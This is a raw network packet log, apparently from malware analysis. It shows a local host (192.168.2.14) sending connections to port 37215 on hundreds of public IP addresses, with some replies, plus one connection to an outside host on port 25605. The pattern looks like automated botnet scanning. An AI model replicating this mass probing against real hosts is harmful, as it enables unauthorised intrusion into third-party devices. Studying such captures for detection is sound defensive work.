                                                                      Aug 2, 2024 13:16:55.189368963 CEST2402737215192.168.2.14156.97.178.210
                                                                      Aug 2, 2024 13:16:55.189368963 CEST2402737215192.168.2.14197.20.136.145
                                                                      Aug 2, 2024 13:16:55.189371109 CEST2402737215192.168.2.14197.141.163.59
                                                                      Aug 2, 2024 13:16:55.189371109 CEST2402737215192.168.2.1441.204.216.246
                                                                      Aug 2, 2024 13:16:55.189371109 CEST2402737215192.168.2.14156.201.105.162
                                                                      Aug 2, 2024 13:16:55.189372063 CEST2402737215192.168.2.1441.242.155.241
                                                                      Aug 2, 2024 13:16:55.189372063 CEST2402737215192.168.2.1441.193.25.3
                                                                      Aug 2, 2024 13:16:55.189378023 CEST2402737215192.168.2.14197.22.93.72
                                                                      Aug 2, 2024 13:16:55.189445019 CEST2402737215192.168.2.14102.137.200.103
                                                                      Aug 2, 2024 13:16:55.189445972 CEST2402737215192.168.2.14156.112.249.113
                                                                      Aug 2, 2024 13:16:55.189445972 CEST2402737215192.168.2.1441.102.3.130
                                                                      Aug 2, 2024 13:16:55.189445972 CEST2402737215192.168.2.14156.169.144.93
                                                                      Aug 2, 2024 13:16:55.189445972 CEST2402737215192.168.2.14156.173.4.163
                                                                      Aug 2, 2024 13:16:55.189445972 CEST2402737215192.168.2.14156.224.129.240
                                                                      Aug 2, 2024 13:16:55.189480066 CEST2402737215192.168.2.14102.39.252.244
                                                                      Aug 2, 2024 13:16:55.189481020 CEST2402737215192.168.2.14197.24.134.98
                                                                      Aug 2, 2024 13:16:55.189481974 CEST2402737215192.168.2.14102.196.165.136
                                                                      Aug 2, 2024 13:16:55.189486027 CEST2402737215192.168.2.1441.213.243.222
                                                                      Aug 2, 2024 13:16:55.189486027 CEST2402737215192.168.2.14102.37.19.5
                                                                      Aug 2, 2024 13:16:55.189486027 CEST2402737215192.168.2.14102.206.226.60
                                                                      Aug 2, 2024 13:16:55.189490080 CEST2402737215192.168.2.14102.26.40.120
                                                                      Aug 2, 2024 13:16:55.189490080 CEST2402737215192.168.2.14197.30.245.122
                                                                      Aug 2, 2024 13:16:55.189491987 CEST2402737215192.168.2.14102.222.252.103
                                                                      Aug 2, 2024 13:16:55.189512968 CEST2402737215192.168.2.14156.167.116.44
                                                                      Aug 2, 2024 13:16:55.189512968 CEST2402737215192.168.2.1441.254.89.27
                                                                      Aug 2, 2024 13:16:55.189565897 CEST2402737215192.168.2.14156.250.60.136
                                                                      Aug 2, 2024 13:16:55.189654112 CEST2402737215192.168.2.14197.239.76.168
                                                                      Aug 2, 2024 13:16:55.189654112 CEST2402737215192.168.2.1441.106.49.215
                                                                      Aug 2, 2024 13:16:55.189654112 CEST2402737215192.168.2.14197.121.196.163
                                                                      Aug 2, 2024 13:16:55.189654112 CEST2402737215192.168.2.14197.71.162.150
                                                                      Aug 2, 2024 13:16:55.189707041 CEST2402737215192.168.2.14197.101.94.118
                                                                      Aug 2, 2024 13:16:55.189707041 CEST2402737215192.168.2.14197.189.66.126
                                                                      Aug 2, 2024 13:16:55.189718962 CEST2402737215192.168.2.14102.34.100.175
                                                                      Aug 2, 2024 13:16:55.189738035 CEST2402737215192.168.2.14102.148.127.130
                                                                      Aug 2, 2024 13:16:55.189738035 CEST2402737215192.168.2.14156.107.10.124
                                                                      Aug 2, 2024 13:16:55.189811945 CEST2402737215192.168.2.14102.93.207.39
                                                                      Aug 2, 2024 13:16:55.189811945 CEST2402737215192.168.2.14156.142.16.82
                                                                      Aug 2, 2024 13:16:55.189825058 CEST2402737215192.168.2.14156.240.101.88
                                                                      Aug 2, 2024 13:16:55.189825058 CEST2402737215192.168.2.1441.86.14.63
                                                                      Aug 2, 2024 13:16:55.189834118 CEST2402737215192.168.2.14102.241.84.86
                                                                      Aug 2, 2024 13:16:55.189834118 CEST2402737215192.168.2.1441.167.235.250
                                                                      Aug 2, 2024 13:16:55.189834118 CEST2402737215192.168.2.14197.55.32.157
                                                                      Aug 2, 2024 13:16:55.189924955 CEST2402737215192.168.2.14102.119.206.63
                                                                      Aug 2, 2024 13:16:55.189924955 CEST2402737215192.168.2.14156.212.233.229
                                                                      Aug 2, 2024 13:16:55.189924955 CEST2402737215192.168.2.14197.86.81.229
                                                                      Aug 2, 2024 13:16:55.189925909 CEST2402737215192.168.2.14156.182.157.156
                                                                      Aug 2, 2024 13:16:55.189925909 CEST2402737215192.168.2.14197.83.111.98
                                                                      Aug 2, 2024 13:16:55.189925909 CEST2402737215192.168.2.14102.103.45.240
                                                                      Aug 2, 2024 13:16:55.189925909 CEST2402737215192.168.2.14197.66.198.141
                                                                      Aug 2, 2024 13:16:55.189948082 CEST2402737215192.168.2.14156.51.199.123
                                                                      Aug 2, 2024 13:16:55.189987898 CEST2402737215192.168.2.14156.24.21.2
                                                                      Aug 2, 2024 13:16:55.190015078 CEST2402737215192.168.2.14102.89.11.220
                                                                      Aug 2, 2024 13:16:55.190066099 CEST2402737215192.168.2.14156.51.1.175
                                                                      Aug 2, 2024 13:16:55.190066099 CEST2402737215192.168.2.14156.95.30.156
                                                                      Aug 2, 2024 13:16:55.190067053 CEST2402737215192.168.2.1441.92.185.8
                                                                      Aug 2, 2024 13:16:55.190067053 CEST2402737215192.168.2.14156.162.220.217
                                                                      Aug 2, 2024 13:16:55.190067053 CEST2402737215192.168.2.14102.118.190.188
                                                                      Aug 2, 2024 13:16:55.190146923 CEST2402737215192.168.2.14102.29.114.60
                                                                      Aug 2, 2024 13:16:55.190181971 CEST2402737215192.168.2.14102.2.54.110
                                                                      Aug 2, 2024 13:16:55.190185070 CEST2402737215192.168.2.14197.196.45.120
                                                                      Aug 2, 2024 13:16:55.190185070 CEST2402737215192.168.2.14197.137.195.214
                                                                      Aug 2, 2024 13:16:55.190201044 CEST2402737215192.168.2.14156.66.36.253
                                                                      Aug 2, 2024 13:16:55.190290928 CEST2402737215192.168.2.14197.15.32.202
                                                                      Aug 2, 2024 13:16:55.190290928 CEST2402737215192.168.2.1441.213.153.115
                                                                      Aug 2, 2024 13:16:55.190290928 CEST2402737215192.168.2.14102.230.130.196
                                                                      Aug 2, 2024 13:16:55.190290928 CEST2402737215192.168.2.14156.254.239.18
                                                                      Aug 2, 2024 13:16:55.190298080 CEST2402737215192.168.2.1441.17.24.185
                                                                      Aug 2, 2024 13:16:55.190323114 CEST2402737215192.168.2.14197.148.157.218
                                                                      Aug 2, 2024 13:16:55.190323114 CEST2402737215192.168.2.14102.31.15.172
                                                                      Aug 2, 2024 13:16:55.190323114 CEST2402737215192.168.2.14102.87.46.163
                                                                      Aug 2, 2024 13:16:55.190325022 CEST2402737215192.168.2.1441.161.175.134
                                                                      Aug 2, 2024 13:16:55.190325022 CEST2402737215192.168.2.14156.113.104.22
                                                                      Aug 2, 2024 13:16:55.190325022 CEST2402737215192.168.2.14156.243.45.153
                                                                      Aug 2, 2024 13:16:55.190387011 CEST2402737215192.168.2.14102.229.213.148
                                                                      Aug 2, 2024 13:16:55.190387011 CEST2402737215192.168.2.14102.78.209.69
                                                                      Aug 2, 2024 13:16:55.190412998 CEST2402737215192.168.2.1441.45.176.5
                                                                      Aug 2, 2024 13:16:55.190496922 CEST2402737215192.168.2.14156.48.232.105
                                                                      Aug 2, 2024 13:16:55.190496922 CEST2402737215192.168.2.14197.18.131.98
                                                                      Aug 2, 2024 13:16:55.190496922 CEST2402737215192.168.2.14156.62.41.220
                                                                      Aug 2, 2024 13:16:55.190519094 CEST2402737215192.168.2.14156.133.109.140
                                                                      Aug 2, 2024 13:16:55.190520048 CEST2402737215192.168.2.14102.201.21.103
                                                                      Aug 2, 2024 13:16:55.190591097 CEST2402737215192.168.2.1441.208.147.10
                                                                      Aug 2, 2024 13:16:55.190591097 CEST2402737215192.168.2.14102.39.170.2
                                                                      Aug 2, 2024 13:16:55.190591097 CEST2402737215192.168.2.14197.135.214.218
                                                                      Aug 2, 2024 13:16:55.190609932 CEST2402737215192.168.2.14156.128.48.111
                                                                      Aug 2, 2024 13:16:55.190609932 CEST2402737215192.168.2.14156.86.207.160
                                                                      Aug 2, 2024 13:16:55.190653086 CEST2402737215192.168.2.1441.196.8.216
                                                                      Aug 2, 2024 13:16:55.190653086 CEST2402737215192.168.2.14197.75.216.236
                                                                      Aug 2, 2024 13:16:55.190661907 CEST2402737215192.168.2.14156.203.128.136
                                                                      Aug 2, 2024 13:16:55.190712929 CEST2402737215192.168.2.14197.198.252.211
                                                                      Aug 2, 2024 13:16:55.190712929 CEST2402737215192.168.2.14102.128.108.57
                                                                      Aug 2, 2024 13:16:55.190712929 CEST2402737215192.168.2.14102.224.126.71
                                                                      Aug 2, 2024 13:16:55.190712929 CEST2402737215192.168.2.14197.22.69.207
                                                                      Aug 2, 2024 13:16:55.190712929 CEST2402737215192.168.2.1441.9.121.82
                                                                      Aug 2, 2024 13:16:55.190712929 CEST2402737215192.168.2.1441.4.248.90
                                                                      Aug 2, 2024 13:16:55.190730095 CEST2402737215192.168.2.14102.133.14.151
                                                                      Aug 2, 2024 13:16:55.190757990 CEST2402737215192.168.2.1441.242.65.146
                                                                      Aug 2, 2024 13:16:55.190757990 CEST2402737215192.168.2.14102.219.155.175
                                                                      Aug 2, 2024 13:16:55.190757990 CEST2402737215192.168.2.14197.98.215.41
                                                                      Aug 2, 2024 13:16:55.190757990 CEST2402737215192.168.2.14197.88.233.73
                                                                      Aug 2, 2024 13:16:55.190757990 CEST2402737215192.168.2.14156.37.213.187
                                                                      Aug 2, 2024 13:16:55.190778971 CEST2402737215192.168.2.1441.71.39.225
                                                                      Aug 2, 2024 13:16:55.190824032 CEST2402737215192.168.2.14156.105.110.128
                                                                      Aug 2, 2024 13:16:55.190824032 CEST2402737215192.168.2.14156.146.27.158
                                                                      Aug 2, 2024 13:16:55.190948009 CEST2402737215192.168.2.1441.27.2.239
                                                                      Aug 2, 2024 13:16:55.190948009 CEST2402737215192.168.2.14102.12.200.179
                                                                      Aug 2, 2024 13:16:55.191131115 CEST2402737215192.168.2.14197.149.241.196
                                                                      Aug 2, 2024 13:16:55.191191912 CEST2402737215192.168.2.14156.69.229.147
                                                                      Aug 2, 2024 13:16:55.191282988 CEST2402737215192.168.2.1441.151.169.188
                                                                      Aug 2, 2024 13:16:55.191282988 CEST2402737215192.168.2.1441.41.151.142
                                                                      Aug 2, 2024 13:16:55.191334963 CEST2402737215192.168.2.14102.220.204.188
                                                                      Aug 2, 2024 13:16:55.191378117 CEST2402737215192.168.2.14197.81.43.51
                                                                      Aug 2, 2024 13:16:55.191378117 CEST2402737215192.168.2.14156.243.22.69
                                                                      Aug 2, 2024 13:16:55.191378117 CEST2402737215192.168.2.14197.112.79.2
                                                                      Aug 2, 2024 13:16:55.191477060 CEST2402737215192.168.2.14102.171.245.232
                                                                      Aug 2, 2024 13:16:55.191495895 CEST2402737215192.168.2.14156.211.192.229
                                                                      Aug 2, 2024 13:16:55.191495895 CEST2402737215192.168.2.14197.151.63.182
                                                                      Aug 2, 2024 13:16:55.290004969 CEST4012225605192.168.2.1437.49.229.111
                                                                      Aug 2, 2024 13:16:55.349416971 CEST3721524027197.2.26.174192.168.2.14
                                                                      Aug 2, 2024 13:16:55.349431038 CEST3721524027156.45.82.85192.168.2.14
                                                                      Aug 2, 2024 13:16:55.349442005 CEST3721524027156.198.128.79192.168.2.14
                                                                      Aug 2, 2024 13:16:55.349502087 CEST2402737215192.168.2.14156.45.82.85
                                                                      Aug 2, 2024 13:16:55.349531889 CEST2402737215192.168.2.14197.2.26.174
                                                                      Aug 2, 2024 13:16:55.349531889 CEST2402737215192.168.2.14156.198.128.79
                                                                      Aug 2, 2024 13:16:55.350094080 CEST3721524027156.254.245.165192.168.2.14
                                                                      Aug 2, 2024 13:16:55.350145102 CEST2402737215192.168.2.14156.254.245.165
                                                                      Aug 2, 2024 13:16:55.350157022 CEST3721524027156.18.188.89192.168.2.14
                                                                      Aug 2, 2024 13:16:55.350167036 CEST3721524027102.92.29.126192.168.2.14
                                                                      Aug 2, 2024 13:16:55.350260019 CEST2402737215192.168.2.14102.92.29.126
                                                                      Aug 2, 2024 13:16:55.350261927 CEST2402737215192.168.2.14156.18.188.89
                                                                      Aug 2, 2024 13:16:55.352826118 CEST3721524027102.195.219.204192.168.2.14
                                                                      Aug 2, 2024 13:16:55.352906942 CEST372152402741.110.238.110192.168.2.14
                                                                      Aug 2, 2024 13:16:55.352919102 CEST372152402741.146.111.131192.168.2.14
                                                                      Aug 2, 2024 13:16:55.352921009 CEST2402737215192.168.2.14102.195.219.204
                                                                      Aug 2, 2024 13:16:55.352972984 CEST2402737215192.168.2.1441.110.238.110
                                                                      Aug 2, 2024 13:16:55.352972984 CEST2402737215192.168.2.1441.146.111.131
                                                                      Aug 2, 2024 13:16:55.354329109 CEST372152402741.85.178.153192.168.2.14
                                                                      Aug 2, 2024 13:16:55.354343891 CEST372152402741.54.115.173192.168.2.14
                                                                      Aug 2, 2024 13:16:55.354353905 CEST3721524027156.30.83.61192.168.2.14
                                                                      Aug 2, 2024 13:16:55.354363918 CEST372152402741.116.122.186192.168.2.14
                                                                      Aug 2, 2024 13:16:55.354373932 CEST372152402741.88.186.42192.168.2.14
                                                                      Aug 2, 2024 13:16:55.354415894 CEST2402737215192.168.2.1441.116.122.186
                                                                      Aug 2, 2024 13:16:55.354418993 CEST2402737215192.168.2.1441.54.115.173
                                                                      Aug 2, 2024 13:16:55.354418993 CEST2402737215192.168.2.14156.30.83.61
                                                                      Aug 2, 2024 13:16:55.354577065 CEST3721524027102.154.102.15192.168.2.14
                                                                      Aug 2, 2024 13:16:55.354585886 CEST2402737215192.168.2.1441.85.178.153
                                                                      Aug 2, 2024 13:16:55.354587078 CEST372152402741.21.135.34192.168.2.14
                                                                      Aug 2, 2024 13:16:55.354585886 CEST2402737215192.168.2.1441.88.186.42
                                                                      Aug 2, 2024 13:16:55.354598045 CEST3721524027197.150.205.191192.168.2.14
                                                                      Aug 2, 2024 13:16:55.354609013 CEST3721524027156.21.59.171192.168.2.14
                                                                      Aug 2, 2024 13:16:55.354656935 CEST2402737215192.168.2.1441.21.135.34
                                                                      Aug 2, 2024 13:16:55.354656935 CEST2402737215192.168.2.14197.150.205.191
                                                                      Aug 2, 2024 13:16:55.354660034 CEST2402737215192.168.2.14156.21.59.171
                                                                      Aug 2, 2024 13:16:55.354684114 CEST2402737215192.168.2.14102.154.102.15
                                                                      Aug 2, 2024 13:16:55.355137110 CEST3721524027102.53.112.211192.168.2.14
                                                                      Aug 2, 2024 13:16:55.355223894 CEST2402737215192.168.2.14102.53.112.211
                                                                      Aug 2, 2024 13:16:55.355360985 CEST3721524027102.59.114.51192.168.2.14
                                                                      Aug 2, 2024 13:16:55.355372906 CEST3721524027156.44.80.225192.168.2.14
                                                                      Aug 2, 2024 13:16:55.355382919 CEST3721524027102.137.221.226192.168.2.14
                                                                      Aug 2, 2024 13:16:55.355427027 CEST2402737215192.168.2.14156.44.80.225
                                                                      Aug 2, 2024 13:16:55.355434895 CEST2402737215192.168.2.14102.59.114.51
                                                                      Aug 2, 2024 13:16:55.355434895 CEST2402737215192.168.2.14102.137.221.226
                                                                      Aug 2, 2024 13:16:55.355556965 CEST3721524027197.82.48.122192.168.2.14
                                                                      Aug 2, 2024 13:16:55.355567932 CEST3721524027102.115.45.35192.168.2.14
                                                                      Aug 2, 2024 13:16:55.355588913 CEST3721524027102.25.221.221192.168.2.14
                                                                      Aug 2, 2024 13:16:55.355613947 CEST2402737215192.168.2.14102.25.221.221
                                                                      Aug 2, 2024 13:16:55.355616093 CEST2402737215192.168.2.14197.82.48.122
                                                                      Aug 2, 2024 13:16:55.355619907 CEST2402737215192.168.2.14102.115.45.35
                                                                      Aug 2, 2024 13:16:55.355715036 CEST3721524027156.26.168.227192.168.2.14
                                                                      Aug 2, 2024 13:16:55.355727911 CEST3721524027156.254.29.98192.168.2.14
                                                                      Aug 2, 2024 13:16:55.355739117 CEST3721524027197.105.33.203192.168.2.14
                                                                      Aug 2, 2024 13:16:55.355777979 CEST2402737215192.168.2.14156.26.168.227
                                                                      Aug 2, 2024 13:16:55.355786085 CEST2402737215192.168.2.14156.254.29.98
                                                                      Aug 2, 2024 13:16:55.355786085 CEST2402737215192.168.2.14197.105.33.203
                                                                      Aug 2, 2024 13:16:55.356424093 CEST372152402741.101.25.17192.168.2.14
                                                                      Aug 2, 2024 13:16:55.356436014 CEST372152402741.207.156.186192.168.2.14
                                                                      Aug 2, 2024 13:16:55.356446981 CEST3721524027156.226.183.187192.168.2.14
                                                                      Aug 2, 2024 13:16:55.356456995 CEST3721524027197.160.198.16192.168.2.14
                                                                      Aug 2, 2024 13:16:55.356523991 CEST2402737215192.168.2.14197.160.198.16
                                                                      Aug 2, 2024 13:16:55.356609106 CEST2402737215192.168.2.14156.226.183.187
                                                                      Aug 2, 2024 13:16:55.356638908 CEST372152402741.238.174.176192.168.2.14
                                                                      Aug 2, 2024 13:16:55.356656075 CEST3721524027102.245.175.237192.168.2.14
                                                                      Aug 2, 2024 13:16:55.356659889 CEST2402737215192.168.2.1441.101.25.17
                                                                      Aug 2, 2024 13:16:55.356659889 CEST2402737215192.168.2.1441.207.156.186
                                                                      Aug 2, 2024 13:16:55.356666088 CEST372152402741.219.250.136192.168.2.14
                                                                      Aug 2, 2024 13:16:55.356676102 CEST372152402741.216.51.106192.168.2.14
                                                                      Aug 2, 2024 13:16:55.356704950 CEST2402737215192.168.2.14102.245.175.237
                                                                      Aug 2, 2024 13:16:55.356755972 CEST2402737215192.168.2.1441.219.250.136
                                                                      Aug 2, 2024 13:16:55.356762886 CEST2402737215192.168.2.1441.216.51.106
                                                                      Aug 2, 2024 13:16:55.356929064 CEST2402737215192.168.2.1441.238.174.176
                                                                      Aug 2, 2024 13:16:55.368273020 CEST3721524027102.202.80.254192.168.2.14
                                                                      Aug 2, 2024 13:16:55.368284941 CEST3721524027156.67.145.154192.168.2.14
                                                                      Aug 2, 2024 13:16:55.368295908 CEST372152402741.54.128.3192.168.2.14
                                                                      Aug 2, 2024 13:16:55.368330002 CEST2402737215192.168.2.14102.202.80.254
                                                                      Aug 2, 2024 13:16:55.368351936 CEST2402737215192.168.2.1441.54.128.3
                                                                      Aug 2, 2024 13:16:55.368351936 CEST2402737215192.168.2.14156.67.145.154
                                                                      Aug 2, 2024 13:16:55.368700027 CEST3721524027156.253.169.41192.168.2.14
                                                                      Aug 2, 2024 13:16:55.368777037 CEST2402737215192.168.2.14156.253.169.41
                                                                      Aug 2, 2024 13:16:55.368803978 CEST372152402741.24.215.156192.168.2.14
                                                                      Aug 2, 2024 13:16:55.368815899 CEST3721524027197.166.70.107192.168.2.14
                                                                      Aug 2, 2024 13:16:55.368912935 CEST2402737215192.168.2.14197.166.70.107
                                                                      Aug 2, 2024 13:16:55.368952990 CEST2402737215192.168.2.1441.24.215.156
                                                                      Aug 2, 2024 13:16:55.369961023 CEST3721524027156.181.126.150192.168.2.14
                                                                      Aug 2, 2024 13:16:55.369972944 CEST3721524027197.216.15.82192.168.2.14
                                                                      Aug 2, 2024 13:16:55.369982958 CEST3721524027102.202.179.221192.168.2.14
                                                                      Aug 2, 2024 13:16:55.369992971 CEST372152402741.142.112.211192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370002031 CEST372152402741.207.183.119192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370012999 CEST3721524027197.55.124.150192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370023012 CEST3721524027102.232.179.79192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370033026 CEST2402737215192.168.2.1441.142.112.211
                                                                      Aug 2, 2024 13:16:55.370034933 CEST372152402741.128.112.156192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370044947 CEST372152402741.205.240.40192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370049000 CEST2402737215192.168.2.14156.181.126.150
                                                                      Aug 2, 2024 13:16:55.370049000 CEST2402737215192.168.2.14197.216.15.82
                                                                      Aug 2, 2024 13:16:55.370049953 CEST372152402741.0.123.239192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370054007 CEST2402737215192.168.2.14102.202.179.221
                                                                      Aug 2, 2024 13:16:55.370054960 CEST372152402741.65.234.216192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370054007 CEST2402737215192.168.2.1441.207.183.119
                                                                      Aug 2, 2024 13:16:55.370055914 CEST2402737215192.168.2.14102.232.179.79
                                                                      Aug 2, 2024 13:16:55.370058060 CEST2402737215192.168.2.14197.55.124.150
                                                                      Aug 2, 2024 13:16:55.370066881 CEST3721524027197.60.173.65192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370073080 CEST3721524027197.172.76.196192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370083094 CEST3721524027156.190.103.161192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370094061 CEST3721524027197.142.123.20192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370105028 CEST372152402741.116.149.196192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370114088 CEST3721524027102.110.229.200192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370115042 CEST2402737215192.168.2.1441.205.240.40
                                                                      Aug 2, 2024 13:16:55.370115042 CEST2402737215192.168.2.14156.190.103.161
                                                                      Aug 2, 2024 13:16:55.370122910 CEST3721524027102.194.57.152192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370129108 CEST2402737215192.168.2.1441.0.123.239
                                                                      Aug 2, 2024 13:16:55.370132923 CEST3721524027197.68.151.116192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370136976 CEST2402737215192.168.2.14197.60.173.65
                                                                      Aug 2, 2024 13:16:55.370143890 CEST372152402741.168.12.246192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370143890 CEST2402737215192.168.2.1441.65.234.216
                                                                      Aug 2, 2024 13:16:55.370146036 CEST2402737215192.168.2.1441.128.112.156
                                                                      Aug 2, 2024 13:16:55.370146036 CEST2402737215192.168.2.14197.142.123.20
                                                                      Aug 2, 2024 13:16:55.370153904 CEST3721524027197.25.11.221192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370172977 CEST3721524027102.96.242.195192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370182037 CEST2402737215192.168.2.14102.194.57.152
                                                                      Aug 2, 2024 13:16:55.370186090 CEST2402737215192.168.2.14102.110.229.200
                                                                      Aug 2, 2024 13:16:55.370187044 CEST2402737215192.168.2.1441.116.149.196
                                                                      Aug 2, 2024 13:16:55.370196104 CEST2402737215192.168.2.14197.68.151.116
                                                                      Aug 2, 2024 13:16:55.370217085 CEST2402737215192.168.2.14197.25.11.221
                                                                      Aug 2, 2024 13:16:55.370271921 CEST3721524027156.255.151.110192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370284081 CEST372152402741.199.121.250192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370294094 CEST372152402741.190.229.130192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370304108 CEST3721524027197.213.203.22192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370328903 CEST2402737215192.168.2.14197.172.76.196
                                                                      Aug 2, 2024 13:16:55.370347977 CEST2402737215192.168.2.1441.199.121.250
                                                                      Aug 2, 2024 13:16:55.370351076 CEST2402737215192.168.2.14197.213.203.22
                                                                      Aug 2, 2024 13:16:55.370352030 CEST2402737215192.168.2.14156.255.151.110
                                                                      Aug 2, 2024 13:16:55.370352030 CEST2402737215192.168.2.1441.190.229.130
                                                                      Aug 2, 2024 13:16:55.370357037 CEST2402737215192.168.2.1441.168.12.246
                                                                      Aug 2, 2024 13:16:55.370397091 CEST2402737215192.168.2.14102.96.242.195
                                                                      Aug 2, 2024 13:16:55.370510101 CEST372152402741.129.18.138192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370522022 CEST3721524027156.251.68.106192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370532036 CEST372152402741.85.192.71192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370541096 CEST3721524027102.147.28.54192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370551109 CEST3721524027102.137.48.248192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370563984 CEST3721524027102.182.157.193192.168.2.14
                                                                      Aug 2, 2024 13:16:55.370603085 CEST2402737215192.168.2.14156.251.68.106
                                                                      Aug 2, 2024 13:16:55.370603085 CEST2402737215192.168.2.14102.182.157.193
                                                                      Aug 2, 2024 13:16:55.370678902 CEST2402737215192.168.2.14102.137.48.248
                                                                      Aug 2, 2024 13:16:55.370680094 CEST2402737215192.168.2.14102.147.28.54
                                                                      Aug 2, 2024 13:16:55.370682001 CEST2402737215192.168.2.1441.129.18.138
                                                                      Aug 2, 2024 13:16:55.370682001 CEST2402737215192.168.2.1441.85.192.71
                                                                      Aug 2, 2024 13:16:55.373059988 CEST3721524027102.198.17.230192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373071909 CEST3721524027156.19.114.220192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373083115 CEST3721524027156.210.107.88192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373126030 CEST2402737215192.168.2.14102.198.17.230
                                                                      Aug 2, 2024 13:16:55.373130083 CEST2402737215192.168.2.14156.210.107.88
                                                                      Aug 2, 2024 13:16:55.373145103 CEST2402737215192.168.2.14156.19.114.220
                                                                      Aug 2, 2024 13:16:55.373306036 CEST3721524027102.195.12.128192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373372078 CEST2402737215192.168.2.14102.195.12.128
                                                                      Aug 2, 2024 13:16:55.373893976 CEST372152402741.50.110.206192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373904943 CEST3721524027102.211.42.17192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373935938 CEST3721524027156.209.25.83192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373949051 CEST3721524027102.249.19.196192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373958111 CEST3721524027197.185.196.147192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373959064 CEST2402737215192.168.2.1441.50.110.206
                                                                      Aug 2, 2024 13:16:55.373966932 CEST3721524027197.110.95.85192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373976946 CEST3721524027102.223.206.240192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373977900 CEST2402737215192.168.2.14156.209.25.83
                                                                      Aug 2, 2024 13:16:55.373981953 CEST2402737215192.168.2.14102.211.42.17
                                                                      Aug 2, 2024 13:16:55.373986959 CEST372152402741.158.30.201192.168.2.14
                                                                      Aug 2, 2024 13:16:55.373995066 CEST2402737215192.168.2.14197.185.196.147
                                                                      Aug 2, 2024 13:16:55.374013901 CEST2402737215192.168.2.14102.249.19.196
                                                                      Aug 2, 2024 13:16:55.374032021 CEST2402737215192.168.2.14197.110.95.85
                                                                      Aug 2, 2024 13:16:55.374032974 CEST2402737215192.168.2.14102.223.206.240
                                                                      Aug 2, 2024 13:16:55.374037981 CEST2402737215192.168.2.1441.158.30.201
                                                                      Aug 2, 2024 13:16:55.374846935 CEST3721524027156.60.234.50192.168.2.14
                                                                      Aug 2, 2024 13:16:55.374857903 CEST3721524027156.146.112.89192.168.2.14
                                                                      Aug 2, 2024 13:16:55.374867916 CEST3721524027156.218.26.198192.168.2.14
                                                                      Aug 2, 2024 13:16:55.374877930 CEST3721524027156.222.74.13192.168.2.14
                                                                      Aug 2, 2024 13:16:55.374887943 CEST3721524027102.198.127.87192.168.2.14
                                                                      Aug 2, 2024 13:16:55.374897957 CEST372152402741.166.102.65192.168.2.14
                                                                      Aug 2, 2024 13:16:55.374917984 CEST3721524027102.55.234.242192.168.2.14
                                                                      Aug 2, 2024 13:16:55.374950886 CEST2402737215192.168.2.14156.222.74.13
                                                                      Aug 2, 2024 13:16:55.374952078 CEST2402737215192.168.2.14156.146.112.89
                                                                      Aug 2, 2024 13:16:55.374950886 CEST2402737215192.168.2.14156.60.234.50
                                                                      Aug 2, 2024 13:16:55.374952078 CEST2402737215192.168.2.14156.218.26.198
                                                                      Aug 2, 2024 13:16:55.374958992 CEST2402737215192.168.2.14102.198.127.87
                                                                      Aug 2, 2024 13:16:55.375019073 CEST2402737215192.168.2.1441.166.102.65
                                                                      Aug 2, 2024 13:16:55.375022888 CEST2402737215192.168.2.14102.55.234.242
                                                                      Aug 2, 2024 13:16:55.375595093 CEST372152402741.205.94.33192.168.2.14
                                                                      Aug 2, 2024 13:16:55.375607014 CEST372152402741.94.216.123192.168.2.14
                                                                      Aug 2, 2024 13:16:55.375617027 CEST3721524027197.187.82.224192.168.2.14
                                                                      Aug 2, 2024 13:16:55.375626087 CEST3721524027102.18.210.93192.168.2.14
                                                                      Aug 2, 2024 13:16:55.375636101 CEST3721524027156.84.188.215192.168.2.14
                                                                      Aug 2, 2024 13:16:55.375643969 CEST372152402741.168.52.155192.168.2.14
                                                                      Aug 2, 2024 13:16:55.375653028 CEST3721524027156.44.242.48192.168.2.14
                                                                      Aug 2, 2024 13:16:55.375660896 CEST3721524027156.234.207.77192.168.2.14
                                                                      Aug 2, 2024 13:16:55.375665903 CEST2402737215192.168.2.14197.187.82.224
                                                                      Aug 2, 2024 13:16:55.375668049 CEST2402737215192.168.2.1441.94.216.123
                                                                      Aug 2, 2024 13:16:55.375668049 CEST2402737215192.168.2.1441.205.94.33
                                                                      Aug 2, 2024 13:16:55.375668049 CEST2402737215192.168.2.14102.18.210.93
                                                                      Aug 2, 2024 13:16:55.375670910 CEST3721524027156.219.114.59192.168.2.14
                                                                      Aug 2, 2024 13:16:55.375683069 CEST3721524027197.191.231.92192.168.2.14
                                                                      Aug 2, 2024 13:16:55.375694036 CEST372152402741.218.8.206192.168.2.14
